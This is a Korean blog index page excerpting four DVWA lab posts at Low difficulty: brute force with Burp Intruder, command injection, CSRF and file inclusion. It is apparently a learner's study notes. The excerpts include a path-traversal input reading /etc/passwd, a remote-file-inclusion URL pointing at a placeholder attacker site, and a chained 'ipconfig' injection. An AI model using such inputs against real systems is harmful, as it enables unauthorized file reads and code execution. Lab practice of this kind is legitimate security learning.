본문 바로가기
반응형

해킹/DVWA29

DVWA 실습 4. File Inclusion (Low) 파일 인클루전의 2가지 유형에 대하여는 아래에서 공부할 수 있다. WSTG - Local File Inclusion WSTG - Remote File Inclusion LFI는 http://vulnerable_host/preview.php?file=../../../../etc/passwd 요런거 RFI는 http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page 요런걸 뜻한다. 말 그대로 local 과 remote의 차이다. dvwa의 file inclusion 페이지는 아래와 같이 생겼다. 아래 file1, 2, 3.php를 하나씩 눌러보면 http://192.168.0.101/vulnerabilities/fi/?page=i.. 2022. 5. 19.
DVWA 실습 3. Cross Site Request Forgery (CSRF) (Low) CSRF에서는 비밀번호를 바꾸는 사이트가 나온다. 공백인 상태로 change를 누르면 비밀번호가 공백으로 변하면서 아래 링크로 접속 되는데, 이번에도 get 방식으로 인자들이 전달 된다... http://192.168.0.101/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change 위 코드처럼 작성한 html 파일을 만들고, 접속을 시도해보면, 비밀번호가 바뀌었다고 뜬다. 실제로 로그인해보면 비밀번호가 공백에서 password로 바뀐 것을 알 수 있다. 2022. 5. 19.
DVWA 실습 2. Command Injection (Low) 해당 취약점에 대한 정보는 아래 링크를 통해 학습하였다. https://dreamhack.io/lecture/courses/187 한국어로 사용중인 윈도우에 dvwa를 설치해서 그런지, 핑 내용이 다 깨져서 보인다... https://chrome.google.com/webstore/detail/set-character-encoding/bpojelgakakmcfmjfilgdlmhefphglae 위 링크를 통해 인코딩을 해줄 수 있는 확장 프로그램을 설치하였다. 마우스 우클릭 후, Korean (EUC-KR)로 바꿔준 뒤, 새로고침 하면 아주 잘 보인다! 윈도우 서버는 처음이라, 커맨드가 입력되는지만 확인을 해보았다. google.com && ipconfig 또는 google.com || ipconfig 이.. 2022. 5. 19.
DVWA 실습 1. Brute Force (Low) 시작에 앞서 http://localhost/ 가 아니라 본인 아이피로 접속을 해야 버프 스위트로 패킷을 잡을 수 있다. 아무렇게나 입력 후, 로그인 버튼을 눌러보면 이름, 비밀번호가 맞지 않다고 나온다. 버프스위트로 해당 패킷을 잡아보면 이렇게 나오는데, 이걸 intruder 로 보내서 brute-force 공격을 진행할 것이다. 그나저나 low라 그런지 로그인 정보를 get 방식으로 보내다니... 엄청나다 intruder 에 대한 기능은 아래를 참고하였다. 2. Burp Suite 메뉴 - 2.5. Intruder : 네이버 블로그 (naver.com) 보낸 패킷이 intruder로 왔을 때, 자동으로 포지션이 잡아진 것을 clear를 통해서 지우고, id, pw 부분을 드래그해서 add 해준다. id.. 2022. 5. 18.
반응형